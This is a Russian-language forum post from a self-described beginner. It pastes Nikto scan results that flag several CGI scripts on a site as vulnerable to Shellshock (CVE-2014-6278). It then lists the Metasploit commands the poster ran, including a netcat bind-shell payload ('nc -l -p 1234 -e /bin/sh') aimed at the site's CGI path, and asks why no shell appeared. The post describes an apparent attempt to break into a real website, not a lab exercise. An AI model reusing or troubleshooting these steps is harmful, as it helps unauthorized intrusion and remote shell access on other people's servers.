OSVDB-112004

28.05.2017, 21:11

YI7bIPb

Новичок

Регистрация: 25.05.2017

Сообщений: 5

С нами: 4721366

Репутация: 0

Server banner has changed from 'Apache' to 'AkamaiGHost' which may suggest a WAF, load balancer or proxy is in place

+ OSVDB-112004: /cgi-bin/admin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).

+ OSVDB-112004: /cgi-bin/administrator.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).

+ OSVDB-112004: /cgi-bin/authLogin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).

+ OSVDB-112004: /cgi-bin/bb-hist.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).

Открываю Метасплойт.... пишу туда:

search 2014-6278

нашел 3 експлойта, вел дальше так set auxiliary/scanner/http/apache_mod_cgi_bash_env

set CMD /usr/bin/nc -l -p 1234 -e /bin/sh зачем не знаю, увидел точно такую же в видео в Ютубе и сделал так же... Сылка на видео в конце будет

дальше set RHOSTS 0.0.0.0 (сайт)

set TARGETURI /cgi-bin/administrator.cgi

exploit пишет что прошел потом открываю консоль пишу:

nc 0.0.0.0 1234 и там не чего не выдает кароче.....

делал по этому видео

Кому не лень подскажите че к чему

𝕏 Twitter Reddit Telegram Копировать ссылку